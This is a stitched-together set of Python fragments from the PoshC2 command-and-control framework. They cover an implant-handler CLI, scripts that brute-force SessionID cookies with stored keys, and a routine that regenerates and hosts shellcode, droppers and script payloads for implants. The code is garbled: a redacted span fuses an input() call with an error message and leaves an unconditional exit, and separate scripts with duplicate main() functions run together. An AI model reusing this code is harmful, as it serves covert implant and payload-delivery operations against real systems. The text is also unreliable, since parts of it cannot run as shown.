def main(args: list[str]) -> None:
    """Entry point of the implant-handler CLI.

    Resolves the operator name (``-u``/``--user`` or an interactive prompt),
    connects to the project database, records a logon message and hands over
    to ``implant_handler_command_loop``.

    args: the raw command-line arguments (``sys.argv[1:]``); an empty list
        skips argparse entirely and goes straight to the interactive prompt.
    """
    signal.signal(signal.SIGINT, catch_exit)
    user = None
    autohide = None
    if len(args) > 0:
        parser = argparse.ArgumentParser(
            description='The command line for handling implants in PoshC2')
        parser.add_argument('-u', '--user', help='the user for this session')
        parser.add_argument(
            '-a', '--autohide', help='to autohide implants after 30 inactive beacons', action='store_true')
        args = parser.parse_args(args)
        user = args.user
        autohide = args.autohide
    # The username is operator-supplied and taken as given: it is only used for
    # attribution in the C2 message log below, not for any access decision.
    while not user:
        print(Colours.GREEN + "A username is required for logging")
        # NOTE(review): the text between the input() prompt and the "database
        # has not been created" message was redacted ("******") in the copy
        # reviewed, so the guard that originally printed that message and
        # called sys.exit() could not be recovered. Presumably it tested that
        # the project database file exists before database_connect() — confirm
        # against the upstream file.
        user = input("Enter your username: "******"The project database has not been created yet")
    sys.exit()
    database_connect()
    new_c2_message("%s logged on." % user)
    clear()
    implant_handler_command_loop(user, "", autohide)
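def main():
    """Entry point: try every key in the project database against a PoshC2 session cookie.

    The single positional argument is either a path to a ``sec.log`` (every
    line carrying ``SessionID=`` is tried) or a raw cookie value. Exits 0 on
    a usage error and 1 when no keys can be read from the database.

    The file-vs-cookie decision is made solely by whether ``open()`` succeeds;
    the original caught every exception around the whole file loop, so an
    unreadable line or a decrypt error was silently misreported as "this is a
    cookie value" and the *path* was fed to the decryptor.
    """
    if len(sys.argv) != 2:
        print(
            "Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <path/to/sec.log>"
        )
        print(
            "Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py <cookie value>"
        )
        sys.exit(0)
    database_connect()
    keys = get_keys()
    if not keys:
        print(
            f"{Colours.RED}[-] Could not get keys from database{Colours.END}")
        sys.exit(1)
    arg = sys.argv[1]
    try:
        log_file = open(arg, "r")
    except OSError:
        # Not an openable file: treat the argument as the cookie value itself.
        print(f"[*] Decrypting cookie value {arg}")
        for key in keys:
            decrypt_and_print(key[0], arg)
        print(f"{Colours.RED}[-] Failed to decrypt cookie value{Colours.END}")
        return
    with log_file:
        print(f"[*] Checking file {arg}")
        for line in log_file:
            # Require the "SessionID=" marker itself; a line that merely
            # mentions "SessionID" used to raise IndexError on the split.
            if "SessionID=" not in line:
                continue
            # Everything after the marker (trailing newline included) is
            # handed to the decryptor, as before.
            encrypted = line.split("SessionID=")[1]
            for key in keys:
                decrypt_and_print(key[0], encrypted)
    # decrypt_and_print reports its own outcome; this trailer is printed
    # unconditionally, as in the original.
    print(
        f"{Colours.RED}[-] Failed to find and decrypt cookie{Colours.END}")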
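def existingdb(db):
    """Reuse an existing project database, regenerating payloads if the C2 host changed.

    If the stored ``PayloadCommsHost`` and ``DomainFrontHeader`` still match
    the configured values, the saved ``quickstart.txt`` is printed and nothing
    is touched. Otherwise ``payloads/`` is rotated to ``payloads_old/`` (the
    previous ``payloads_old/`` is deleted), the ``C2Server`` rows are updated,
    a new URL record and payload set are generated, and the default hosted-file
    entries are re-inserted.

    db: enum-like value whose ``.value`` is the database name shown to the
        operator.
    """
    # Colour code is appended after the message, as in the original output.
    print("Using existing %s database / project" % db.value + Colours.GREEN)
    database_connect()
    C2 = get_c2server_all()
    if C2.PayloadCommsHost == PayloadCommsHost and C2.DomainFrontHeader == DomainFrontHeader:
        qstart = "%squickstart.txt" % PoshProjectDirectory
        if os.path.exists(qstart):
            with open(qstart, 'r') as f:
                print(f.read())
        return
    print("Error different IP so regenerating payloads")
    _rotate_payload_dirs()
    update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
    update_item("QuickCommand", "C2Server", QuickCommand)
    update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
    C2 = get_c2server_all()
    stamp = datetime.now(timezone.utc).strftime('%Y-%m-%d-%H:%M:%S')
    urlId = new_urldetails(f"updated_host-{stamp}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
    # NOTE(review): the stored EncKey is reused, so the regenerated payloads
    # share their key with the set just moved to payloads_old/; the old set is
    # moved aside, not revoked.
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer,
                          get_newimplanturl(), PayloadsDirectory, URLID=urlId)
    newPayload.CreateAll()
    newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
    # adding default hosted payloads
    _insert_default_hosted_files(select_item("QuickCommand", "C2Server"))


def _rotate_payload_dirs():
    """Move payloads/ to payloads_old/ (replacing any previous payloads_old/) and create an empty payloads/."""
    import shutil
    old = "%spayloads_old" % PoshProjectDirectory
    current = "%spayloads" % PoshProjectDirectory
    if os.path.exists(old):
        shutil.rmtree(old)
    # A missing payloads/ (e.g. removed by hand) used to make os.rename raise;
    # just fall through to creating a fresh one.
    if os.path.exists(current):
        os.rename(current, old)
    os.makedirs(current)


# (URI suffix, payload file, content type, fourth insert_hosted_file flag).
# The last two insert_hosted_file arguments are passed through unchanged from
# the original; their meaning is not visible here.
_DEFAULT_HOSTED_FILES = [
    ("s/86/portal", "Sharp_v4_x86_Shellcode.bin", "text/html", "Yes"),
    ("s/64/portal", "Sharp_v4_x64_Shellcode.bin", "text/html", "Yes"),
    ("p/86/portal", "Posh_v4_x86_Shellcode.bin", "application/x-msdownload", "No"),
    ("p/64/portal", "Posh_v4_x64_Shellcode.bin", "application/x-msdownload", "No"),
    ("_ex86", "Posh_v4_dropper_x86.exe", "application/x-msdownload", "No"),
    ("_ex64", "Posh_v4_dropper_x64.exe", "application/x-msdownload", "No"),
    ("_bs", "payload.bat", "text/html", "No"),
    ("_rp", "payload.txt", "text/html", "Yes"),
    ("_rg", "rg_sct.xml", "text/html", "No"),
    ("_cs", "cs_sct.xml", "text/html", "No"),
    ("_py", "aes.py", "text/html", "No"),
]


def _insert_default_hosted_files(quick_command_uri):
    """Register the default hosted payloads under quick_command_uri, in the original order."""
    for suffix, filename, content_type, flag in _DEFAULT_HOSTED_FILES:
        insert_hosted_file(f"{quick_command_uri}{suffix}",
                           f"{PayloadsDirectory}{filename}",
                           content_type, flag, "Yes")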
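#!/usr/bin/env python3
"""Try every key in the project database against the SessionID cookies found in a log file.

Usage: python3 <script> <path/to/sec.log>
"""
import re
import sys

from poshc2.Colours import Colours
from poshc2.server.Core import decrypt
from poshc2.server.database.DB import get_keys, database_connect

if len(sys.argv) != 2:
    # The original indexed sys.argv[1] unguarded and died with an IndexError.
    print("Usage: python3 %s <path/to/sec.log>" % sys.argv[0])
    sys.exit(1)

database_connect()
result = get_keys()
if result:
    with open(sys.argv[1], "r") as file:
        for line in file:
            if "SessionID=" not in line:
                continue
            # Take the text after the SessionID marker. The original split on
            # the first '=' of the whole line, which returns the wrong field
            # whenever another 'key=value' precedes SessionID; surrounding
            # whitespace (the trailing newline) is dropped as well.
            encrypted = line.split("SessionID=", 1)[1].strip()
            for i in result:
                try:
                    value = decrypt(i[0], encrypted)
                    # NOTE(review): this echoes the raw key to the terminal;
                    # consider printing only an index or a truncated key.
                    print(Colours.GREEN + "Success with Key %s - %s" % (i[0], value))
                except Exception:
                    # Any decrypt failure (bad key, padding, encoding) just
                    # means "not this key"; move on to the next one.
                    print(Colours.RED + "Failed with Key %s" % i[0])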